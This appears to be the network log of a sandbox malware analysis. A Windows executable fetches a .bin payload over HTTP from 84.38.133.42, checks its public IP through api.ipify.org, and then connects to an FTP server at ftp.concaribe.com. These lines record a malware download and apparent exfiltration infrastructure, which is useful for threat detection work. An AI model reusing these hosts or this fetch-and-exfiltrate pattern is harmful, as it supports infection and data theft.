                                                Oct 31, 2024 11:45:28.175000906 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.240283966 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.240318060 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.240358114 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.240370989 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.240379095 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.240406036 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.240438938 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.240458012 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.240473986 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.240489006 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.240511894 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.243552923 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.243614912 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.243653059 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.243688107 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.243700027 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.243732929 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.243851900 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.243885994 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.243900061 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.243920088 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.243926048 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.243976116 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.243988991 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.244012117 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.244019985 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.244051933 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.291891098 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.291924000 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.291965961 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.291985035 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.332405090 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.332484007 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.332689047 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.332740068 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.357366085 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.357394934 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.357446909 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.357448101 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.357470036 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.357481956 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.357489109 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.357533932 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.357558012 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.357567072 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.357570887 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.357606888 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360579967 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360609055 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360630989 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360646963 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360661030 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360692978 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360697031 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360727072 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360758066 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360770941 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360776901 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360820055 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360827923 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360856056 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360871077 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360891104 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360899925 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360924959 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360938072 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360960007 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360968113 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.360987902 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.360996008 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.361027002 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.449810028 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.449865103 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.449866056 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.449899912 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.449920893 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.449934959 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.474517107 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.474570990 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.474574089 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.474606037 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.474612951 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.474638939 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.474646091 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.474672079 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.474678040 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.474711895 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.477646112 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.477680922 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.477715969 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.477725983 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.477750063 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.477778912 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.477782965 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.477794886 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.477824926 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.477832079 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.477864981 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.477890968 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.477897882 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.477906942 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.477943897 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.524693966 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.524751902 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.524945974 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.524996996 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.566437960 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.566473007 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.566487074 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.566508055 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.566514969 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.566540003 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.591521978 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.591578007 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.591584921 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.591619015 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.591634989 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.591661930 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.591667891 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.591701984 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.591715097 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.591733932 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.591744900 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.591778040 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.594619036 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.594661951 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.594671965 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.594703913 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.594710112 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.594742060 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.594813108 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.594846010 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.594858885 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.594878912 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.594888926 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.594912052 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.594926119 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.594944954 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.594955921 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.594985962 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.683501005 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.683535099 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.683584929 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.683585882 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.683599949 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.683618069 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.683626890 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.683650970 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.683659077 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.683685064 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.683692932 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.683723927 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.708569050 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.708619118 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.708635092 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.708652020 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.708666086 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.708683968 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.708684921 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.708718061 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.708734989 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.708756924 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.708769083 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.708820105 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.711673975 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.711705923 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.711726904 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.711741924 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.711755037 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.711786985 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.711795092 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.711819887 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.711824894 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.711853027 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.711858988 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.711890936 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.712003946 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.712035894 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.712049961 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.712070942 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.712074041 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.712104082 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.712111950 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.712143898 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.800659895 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.800715923 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.800734997 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.800749063 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.800754070 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.800785065 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.800791025 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.800817966 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.800827980 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.800858021 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.825541973 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.825593948 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.825598955 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.825627089 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.825634003 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.825659990 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.825668097 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.825692892 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.825702906 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.825740099 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.828675032 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.828725100 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.828730106 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.828775883 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.828789949 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.828809977 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.828829050 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.828843117 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.828860044 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.828875065 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.828890085 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.828922987 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.829065084 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.829097986 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.829114914 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.829133034 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.829145908 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.829180002 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.829180002 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.829230070 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.917625904 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.917681932 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.917689085 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.917715073 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.917721033 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.917747974 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.917752028 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.917779922 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.917782068 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.917814970 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.917823076 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.917855978 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.942624092 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.942687035 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.942687988 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.942733049 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.942739010 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.942773104 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.942784071 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.942804098 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.942815065 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.942837000 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.942845106 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.942881107 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.945784092 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.945828915 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.945835114 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.945880890 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.945888042 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.945923090 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.945931911 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.945955992 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.945966959 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.945990086 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.946000099 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.946032047 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.946038961 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.946069002 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.946082115 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.946100950 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.946110964 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.946132898 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:28.946144104 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:28.946177959 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.034861088 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.034898996 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.034919024 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.034934044 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.034940958 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.034966946 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.034966946 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.035001040 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.035002947 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.035038948 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.075860023 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.075917959 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.075918913 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.075952053 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.075959921 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.075985909 CET806211584.38.133.42192.168.2.4
                                                Oct 31, 2024 11:45:29.075989008 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:29.076024055 CET6211580192.168.2.484.38.133.42
                                                Oct 31, 2024 11:45:30.024135113 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:30.024159908 CET44362131172.67.74.152192.168.2.4
                                                Oct 31, 2024 11:45:30.024225950 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:30.038239956 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:30.038254023 CET44362131172.67.74.152192.168.2.4
                                                Oct 31, 2024 11:45:30.647953987 CET44362131172.67.74.152192.168.2.4
                                                Oct 31, 2024 11:45:30.648053885 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:30.649960041 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:30.649971008 CET44362131172.67.74.152192.168.2.4
                                                Oct 31, 2024 11:45:30.650376081 CET44362131172.67.74.152192.168.2.4
                                                Oct 31, 2024 11:45:30.692317009 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:30.697432995 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:30.743326902 CET44362131172.67.74.152192.168.2.4
                                                Oct 31, 2024 11:45:30.878984928 CET44362131172.67.74.152192.168.2.4
                                                Oct 31, 2024 11:45:30.879038095 CET44362131172.67.74.152192.168.2.4
                                                Oct 31, 2024 11:45:30.879093885 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:30.886112928 CET62131443192.168.2.4172.67.74.152
                                                Oct 31, 2024 11:45:31.938688040 CET6214221192.168.2.4192.185.13.234
                                                Oct 31, 2024 11:45:31.943578005 CET2162142192.185.13.234192.168.2.4
                                                Oct 31, 2024 11:45:31.943658113 CET6214221192.168.2.4192.185.13.234
                                                Oct 31, 2024 11:45:31.947139025 CET6214221192.168.2.4192.185.13.234
                                                Oct 31, 2024 11:45:31.952243090 CET2162142192.185.13.234192.168.2.4
                                                Oct 31, 2024 11:45:31.952450991 CET6214221192.168.2.4192.185.13.234
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 31, 2024 11:44:23.654659033 CET53532401.1.1.1192.168.2.4
                                                Oct 31, 2024 11:45:30.010555983 CET6187253192.168.2.41.1.1.1
                                                Oct 31, 2024 11:45:30.019054890 CET53618721.1.1.1192.168.2.4
                                                Oct 31, 2024 11:45:31.621936083 CET5548753192.168.2.41.1.1.1
                                                Oct 31, 2024 11:45:31.937545061 CET53554871.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 31, 2024 11:45:30.010555983 CET192.168.2.41.1.1.10x2a13Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Oct 31, 2024 11:45:31.621936083 CET192.168.2.41.1.1.10x660aStandard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 31, 2024 11:45:30.019054890 CET1.1.1.1192.168.2.40x2a13No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Oct 31, 2024 11:45:30.019054890 CET1.1.1.1192.168.2.40x2a13No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Oct 31, 2024 11:45:30.019054890 CET1.1.1.1192.168.2.40x2a13No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Oct 31, 2024 11:45:31.937545061 CET1.1.1.1192.168.2.40x660aNo error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                                Oct 31, 2024 11:45:31.937545061 CET1.1.1.1192.168.2.40x660aNo error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                                • api.ipify.org
                                                • 84.38.133.42
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.46211584.38.133.42807880C:\Users\user\Desktop\u9aPQQIwhj.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 31, 2024 11:45:26.576579094 CET185OUTGET /SaclKvrenGmYaqCeKqHVn198.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: 84.38.133.42
                                                Cache-Control: no-cache
                                                Oct 31, 2024 11:45:28.117253065 CET1236INHTTP/1.1 200 OK
                                                Content-Type: application/octet-stream
                                                Last-Modified: Thu, 31 Oct 2024 07:57:53 GMT
                                                Accept-Ranges: bytes
                                                ETag: "b16ac1966a2bdb1:0"
                                                Server: Microsoft-IIS/8.5
                                                Date: Thu, 31 Oct 2024 10:45:25 GMT
                                                Content-Length: 241728
